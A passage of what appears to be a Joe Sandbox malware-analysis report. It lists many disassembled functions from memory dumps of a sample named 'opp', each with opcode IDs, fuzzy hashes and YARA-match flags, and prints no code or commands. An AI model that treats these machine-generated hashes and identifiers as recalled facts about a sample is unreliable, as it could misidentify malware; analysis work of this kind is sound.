                                                              • Source File: 00000001.00000002.2394022437.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1660000_opp.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4a8410b2796410a034b282cc4524011cf6416ea1233af6debe68f37513c29117
                                                              • Instruction ID: 63cdc39a9d180d327dc573783fd86b2ac2b52b336eb5b9c152f4da979beaee09
                                                              • Opcode Fuzzy Hash: 4a8410b2796410a034b282cc4524011cf6416ea1233af6debe68f37513c29117
                                                              • Instruction Fuzzy Hash: 7F41AD32A40268DBCF21DF68CD44BEA77B9EF44740F4101AAE909AB341DB359E81CF95
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0175866E Relevance: .1, Instructions: 129COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2394022437.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1660000_opp.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                              • Instruction ID: 46df83b63233b085474f857e93df0659e5381d9ddcf719a81ac04c087134e89e
                                                              • Opcode Fuzzy Hash: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                              • Instruction Fuzzy Hash: 62419275B10205EBDB55DB9ACC84AAFFBBAEF88710F144069ED04A7346DAB0DD0087A1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0175F0E0 Relevance: .1, Instructions: 129COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2394022437.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1660000_opp.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2b25ca53b199a99bbba124d63fabc92aa1ddcd43d9f5b861f45c6b00c765c575
                                                              • Instruction ID: e4d79e8f128dbe375478d6ac32e8fb16889687003440f5c1dd50c3c0aa8d6406
                                                              • Opcode Fuzzy Hash: 2b25ca53b199a99bbba124d63fabc92aa1ddcd43d9f5b861f45c6b00c765c575
                                                              • Instruction Fuzzy Hash: 0741B0712183418FD704CF29D8A597ABBE1FF84625F05895EF8D68B382DB30D819CBA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 01690887 Relevance: .1, Instructions: 128COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2394022437.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1660000_opp.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: bad2d6d4b4b9b417ad603079d95ccccac1afe0d9bf9e9849419750dc3ca85a51
                                                              • Instruction ID: e7d944cdfa914ea367a1c2fe0e01f9c71e121efc554da1d7aaad3ce3389b3039
                                                              • Opcode Fuzzy Hash: bad2d6d4b4b9b417ad603079d95ccccac1afe0d9bf9e9849419750dc3ca85a51
                                                              • Instruction Fuzzy Hash: B741D1716007019FEB25CF28CD80A26B7FDFF48314B109A6EE55787A50E730E856CB94
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0173D5B0 Relevance: .1, Instructions: 128COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2394022437.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1660000_opp.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 395fc130485540bf2fe08367c2f311c2ad083c3e441b4a8d5dd775ba5376d0f9
                                                              • Instruction ID: 2c33b33a8d60ac1c1066a728b5b3f32672c10cd8387901a3870ae62883201dd8
                                                              • Opcode Fuzzy Hash: 395fc130485540bf2fe08367c2f311c2ad083c3e441b4a8d5dd775ba5376d0f9
                                                              • Instruction Fuzzy Hash: 90414330A08295DFCB25CFA9C4856BAFBF1FF89340F458489E1D58B247C334A456EB60
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 016BA470 Relevance: .1, Instructions: 127COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2394022437.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1660000_opp.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e95ff785e058c2eadd133144725a8e93e2372803535706fdbe85dc5ccd7bffab
                                                              • Instruction ID: b68b00a3d73d900392cdf222ad3be8b535a9bb06a3f57052ed66521d86c16e0b
                                                              • Opcode Fuzzy Hash: e95ff785e058c2eadd133144725a8e93e2372803535706fdbe85dc5ccd7bffab
                                                              • Instruction Fuzzy Hash: 1D41BE32981205CFDB21DFA8CC94BEE7BB1FB18324F18415DD512AB391DB759A81CBA4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 01698BF0 Relevance: .1, Instructions: 124COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2394022437.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1660000_opp.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5cfdfd4aa6ddb27fe3b6dae9b72e8f6546c10eb5f44f61e889b6a8a941cbb7fa
                                                              • Instruction ID: e127471e3809a712f98adcb10130776d5e41413f144613ddc172c8b393df6107
                                                              • Opcode Fuzzy Hash: 5cfdfd4aa6ddb27fe3b6dae9b72e8f6546c10eb5f44f61e889b6a8a941cbb7fa
                                                              • Instruction Fuzzy Hash: 2941D172A4020ACBDB249F58CC40B5EBBBAFB95614F29812ED9029B255C775D842CF90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 01688918 Relevance: .1, Instructions: 123COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2394022437.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1660000_opp.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a1c72f7fe2771f2a1881cef25ad7881337247e5e2f4da47d6cf587aa8cd4322b
                                                              • Instruction ID: a54992db65f9aaec5f693f648f53dd719d794b7d011e1d18d9dfd6834821ea97
                                                              • Opcode Fuzzy Hash: a1c72f7fe2771f2a1881cef25ad7881337247e5e2f4da47d6cf587aa8cd4322b
                                                              • Instruction Fuzzy Hash: 36415C319093069ED712EF69CC80A6BB7E9EF84B54F400A2EF984D7250E731DE458B97
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0168A020 Relevance: .1, Instructions: 122COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2394022437.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1660000_opp.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                              • Instruction ID: bf247d6b0ba6658be822223839bfdd9409484900b032a1c1c80d97437c165a2b
                                                              • Opcode Fuzzy Hash: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                              • Instruction Fuzzy Hash: BB416C31A01211DBDB11EE9C8C887BABBB2EB50759F15836BEE419B341D7329D42CB90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 016909AD Relevance: .1, Instructions: 122COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2394022437.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1660000_opp.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0095ad03df5137420204efd6e224e824d0b9222f108d3071df999732833ea5eb
                                                              • Instruction ID: a95b652f895e533275dd99afeafeab08ed1af13a5f86e1ad1e314df76d0030a7
                                                              • Opcode Fuzzy Hash: 0095ad03df5137420204efd6e224e824d0b9222f108d3071df999732833ea5eb
                                                              • Instruction Fuzzy Hash: B1417971A41601EFDB21CF18CC40B26BBE9FF54714F60862EE8598B352E775E942CB94
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00402709 Relevance: .1, Instructions: 121COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2391790810.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_opp.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f223dce0727b59fa1dc73588ce036a7e567d45d087003f336201cd1339c614a3
                                                              • Instruction ID: 73ab5c357ecf3964de7b9d83347366fa26f8ba704d8ef0fb6e5fde71d22a075e
                                                              • Opcode Fuzzy Hash: f223dce0727b59fa1dc73588ce036a7e567d45d087003f336201cd1339c614a3
                                                              • Instruction Fuzzy Hash: 07316236B001198BCB1CCE1DCE956ADB3E5EBA8304B48913AED46EF3D1E574ED218684
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 016C0710 Relevance: .1, Instructions: 121COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2394022437.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1660000_opp.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                              • Instruction ID: f83ab10fd40f5928f1cb45387cde7fb640b2c393fa5109c7cb8011feb5ff6256
                                                              • Opcode Fuzzy Hash: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                              • Instruction Fuzzy Hash: 11413B79A01605EFDB24CF98C990ABABBF9FF18B00B10496DE556D7650D330EA44CF60
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0169262C Relevance: .1, Instructions: 119COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2394022437.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1660000_opp.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0883c5648b2c5a5d402cb3678286cb3547070f248acb86ec9eb721d9fa51efcc
                                                              • Instruction ID: ed3060987d68206d35db50662a046cbe3efe48cedb0f4c3f06f969bbd084e037
                                                              • Opcode Fuzzy Hash: 0883c5648b2c5a5d402cb3678286cb3547070f248acb86ec9eb721d9fa51efcc
                                                              • Instruction Fuzzy Hash: CE41AFB0942701EFCF21EF28CD50A69B7FAFF45710F1082ADD5069B6A1DB30A941CB91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 016CC8F9 Relevance: .1, Instructions: 116COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2394022437.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1660000_opp.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 953e10c3a70d60c26fba67a541d4333eaec9b55d40b5b5170fae9bd468626550
                                                              • Instruction ID: 247271d554d3202fb3fc9c211c9ea398febe674e2258a0f529e8dd13ba3f5b3f
                                                              • Opcode Fuzzy Hash: 953e10c3a70d60c26fba67a541d4333eaec9b55d40b5b5170fae9bd468626550
                                                              • Instruction Fuzzy Hash: AE318DB1A01345DFDB12CF98C840799BBF5FB09B14F2181AED519DB251D3729902CF94
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 017107C3 Relevance: .1, Instructions: 114COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2394022437.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1660000_opp.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: dfe58a19ded66aa0e827af3b0257721e6417e9017d9e1ce318e932a96a446742
                                                              • Instruction ID: c9b48a158fd05deeb00da81fdafbf270396694ac8a420565df8a6847b7a1af8b
                                                              • Opcode Fuzzy Hash: dfe58a19ded66aa0e827af3b0257721e6417e9017d9e1ce318e932a96a446742
                                                              • Instruction Fuzzy Hash: 4A418E719083059FD320DF29C845B9BFBE8FF88664F108A2EF998D7251D7709944CB92
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0175EEDB Relevance: .1, Instructions: 113COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2394022437.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1660000_opp.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ce456ba327722c38076f1e93a21bb70d8eb3a3c3127b428a19b2bdb97855aac6
                                                              • Instruction ID: 464a4c907f0219163b7f9d21a5226503bea5e4205fc9e67626ef467f0d5252f2
                                                              • Opcode Fuzzy Hash: ce456ba327722c38076f1e93a21bb70d8eb3a3c3127b428a19b2bdb97855aac6
                                                              • Instruction Fuzzy Hash: F141D133E0402A8BCB18CF68C490579F7F5FB4830476A42BDDD06AB285EF74AA05CB90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 016880A0 Relevance: .1, Instructions: 111COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2394022437.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1660000_opp.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: dd0c0a0cdc179b10ff3fa259026a53b8fbe8d456567746426a9693b44d5dbc75
                                                              • Instruction ID: dd2e8c5f14bc710387583793ac2ccadc39059b2f8c6a052fe6ef0035c9fbd660
                                                              • Opcode Fuzzy Hash: dd0c0a0cdc179b10ff3fa259026a53b8fbe8d456567746426a9693b44d5dbc75
                                                              • Instruction Fuzzy Hash: 5F41E171A05617AFCB11EF18CD806A8B7BABF54761FA08329D855A7380DF34ED428BD0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 017105A7 Relevance: .1, Instructions: 111COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2394022437.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1660000_opp.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2bebbfd6b625e3face9e296679399bd890144fd0279cbf18110a062372e3b333
                                                              • Instruction ID: 8be42e6525582ec6cd7388aacc344ee1e4a5bacbb57612311d80931e666090d0
                                                              • Opcode Fuzzy Hash: 2bebbfd6b625e3face9e296679399bd890144fd0279cbf18110a062372e3b333
                                                              • Instruction Fuzzy Hash: EF41CF726047469FC320DF6CC840A6AB7E9FFC8700F144A2DF99597684E730E954C7AA
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 01694859 Relevance: .1, Instructions: 111COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2394022437.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1660000_opp.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b5de3b9ba8df2aa53f28975242628f075957156df93e9b6318a4ee7ab118e502
                                                              • Instruction ID: cad3c86e282cd97e5637d2d16b8febb1334b735be6a308e57033b2c9e23a4324
                                                              • Opcode Fuzzy Hash: b5de3b9ba8df2aa53f28975242628f075957156df93e9b6318a4ee7ab118e502
                                                              • Instruction Fuzzy Hash: C941C3306043029FDB25DF18DE94B2ABBEEEF80364F14442DEA568B391DB30D852CB91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 01688B50 Relevance: .1, Instructions: 111COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2394022437.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1660000_opp.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 593be589c3860463012ee5384e68dbbe039ab90525253a17fcdf01bb9cc9f712
                                                              • Instruction ID: 31105ed1c949b76b26118c119928f069872be6e96414384b912c0e1efa6682d6
                                                              • Opcode Fuzzy Hash: 593be589c3860463012ee5384e68dbbe039ab90525253a17fcdf01bb9cc9f712
                                                              • Instruction Fuzzy Hash: 10419DB1A01605CFCB14EF69CD8099DBBF6FF98320B50862ED466A73A0DB34A941CB40
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0040F6E3 Relevance: .1, Instructions: 108COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2391790810.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_opp.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a4f1a47e469db01a1eef6c7f2d5b49e19d955ffd97c7228385fc8c35807cfa85
                                                              • Instruction ID: 20617943ba27cf9913a75ba9acc68ee24b16d44be8e4e10569188ab427515f71
                                                              • Opcode Fuzzy Hash: a4f1a47e469db01a1eef6c7f2d5b49e19d955ffd97c7228385fc8c35807cfa85
                                                              • Instruction Fuzzy Hash: 703172116587F14ED31E836D08BDA75AEC18E9720174EC2FEDADA6F2F3C4988408D3A5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 016A02E1 Relevance: .1, Instructions: 106COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2394022437.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1660000_opp.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                              • Instruction ID: f834a1bfaaee00c72de47e81f9c9fd1f0210576e0cb7c1e498b56619a78b14ac
                                                              • Opcode Fuzzy Hash: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                              • Instruction Fuzzy Hash: F0310531A04245AFDB12CB6CCC84BABBFE9AF14350F0445A9F855DB352C7749885CBA4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0173E3DB Relevance: .1, Instructions: 105COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2394022437.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1660000_opp.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 525510520d602a48c2e256516ce59cfbd2549975acc388ab0292e8d5adf99caa
                                                              • Instruction ID: aa1896ac19e129190877cd2b03d5373bdc21408da2c2b7406fb06c62934a6911
                                                              • Opcode Fuzzy Hash: 525510520d602a48c2e256516ce59cfbd2549975acc388ab0292e8d5adf99caa
                                                              • Instruction Fuzzy Hash: 1731A631740706ABD7229F658C91FAFB6A9AB99B50F10002CF600AB392DAA4DC00D7E4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 01744B4B Relevance: .1, Instructions: 104COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2394022437.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1660000_opp.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 81e3b2de494ed0585143ae6f517d676b1ab0a77a1c46359230578e13ff9ae193
                                                              • Instruction ID: a799d06981730e1dacbca67b2afc46b34cef044fb357230b0046618e740b512c
                                                              • Opcode Fuzzy Hash: 81e3b2de494ed0585143ae6f517d676b1ab0a77a1c46359230578e13ff9ae193
                                                              • Instruction Fuzzy Hash: C131CF726452019FC721DF19D880F2AB7E6FB80360F1A846EF9969B752DB30AC40DF95
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 01694260 Relevance: .1, Instructions: 102COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2394022437.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1660000_opp.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e3343d56e3a7def2c1cda9e7ba7760322056313ab897028e612177e59a9e1235
                                                              • Instruction ID: 0fc7d5a867aa67c7bd9a90beeec64a132e8bf9a8323b0e5d2bb41e33346ae195
                                                              • Opcode Fuzzy Hash: e3343d56e3a7def2c1cda9e7ba7760322056313ab897028e612177e59a9e1235
                                                              • Instruction Fuzzy Hash: C541AF75200B45DFDB22CF29CD81B9A7BEAAF45314F10842DE65A8B351CB74E801CBA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 01744BB0 Relevance: .1, Instructions: 101COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2394022437.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1660000_opp.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: cc48ada9e5d81709db1de432cd347555c6bdd062fe7ae80dfd73848d238a4e7f
                                                              • Instruction ID: 00209ae3ae3d4d38f7e835db71fe009f3d3283f9818af689483977223fb6d911
                                                              • Opcode Fuzzy Hash: cc48ada9e5d81709db1de432cd347555c6bdd062fe7ae80dfd73848d238a4e7f
                                                              • Instruction Fuzzy Hash: 4931AD716043019FD720DF29C880B2AB7E5FB84720F19856DF9969B391E730EC04DB99
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0170EB1D Relevance: .1, Instructions: 100COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2394022437.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1660000_opp.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e88b10b5fa5be680a9822cfad04070133e9438e7733eb72f53d9e3430b99259e
                                                              • Instruction ID: 9c2b426f35446a8d77c1af088846cbec14515db72475f1c39f3d9f229ee6dc40
                                                              • Opcode Fuzzy Hash: e88b10b5fa5be680a9822cfad04070133e9438e7733eb72f53d9e3430b99259e
                                                              • Instruction Fuzzy Hash: 7E31B472201B82DBF327679CCD48F25FBD9BB41B44F1D08A4AB459B6D1DF68D880C664
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 017561C3 Relevance: .1, Instructions: 97COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2394022437.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1660000_opp.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ad13b8bd251b8a19d0127ce60c981ad606b594d53cc559994467e1fbc16b7b1b
                                                              • Instruction ID: 1e99e2e01014f956af2c2549f1e1b741a541680ef1af667f95b9d0a36d24dd3c
                                                              • Opcode Fuzzy Hash: ad13b8bd251b8a19d0127ce60c981ad606b594d53cc559994467e1fbc16b7b1b
                                                              • Instruction Fuzzy Hash: 2D31B275E00256ABDB15DF98CC40BAEF7B6FB44B80F854168F900EB244DBB0AD40CBA4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0173483A Relevance: .1, Instructions: 96COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2394022437.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1660000_opp.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 17bd083ec911e680d065ef02d96c251e4f95002f55a4aaf7a4dde4bd1a821e40
                                                              • Instruction ID: 8fcd4a2d2b4942453f72ab53981dd861886b9f8b39ec19c85ba8710401d64ce6
                                                              • Opcode Fuzzy Hash: 17bd083ec911e680d065ef02d96c251e4f95002f55a4aaf7a4dde4bd1a821e40
                                                              • Instruction Fuzzy Hash: 5E316176A4012DABCF21DF54DC88BDEBBBAAB98310F1100E5A509A7251CA34DE91CF90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 016BEB20 Relevance: .1, Instructions: 96COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2394022437.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1660000_opp.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4d3eb91d211cc79e1319cf53707791eb174def1c7b994a065692c4d7197ff7c4
                                                              • Instruction ID: 6618de2dccdd0ad37df0a0770f961bf04c0960ed04e977a232e809bbe1ecb39a
                                                              • Opcode Fuzzy Hash: 4d3eb91d211cc79e1319cf53707791eb174def1c7b994a065692c4d7197ff7c4
                                                              • Instruction Fuzzy Hash: 9631C773E00215AFDB21DFA9CD80AEEBBF9EF04750F114469E516D7250D7719E408BA4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 01756BD7 Relevance: .1, Instructions: 96COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2394022437.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1660000_opp.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 66a8785a32eeaecb7bc146932d86e48fd9c1177c1de389ec6a9335b449df92ea
                                                              • Instruction ID: c13799a2a37c15cf5ad753e522be4c297f4a86c291dfc008c543cc028abd1096
                                                              • Opcode Fuzzy Hash: 66a8785a32eeaecb7bc146932d86e48fd9c1177c1de389ec6a9335b449df92ea
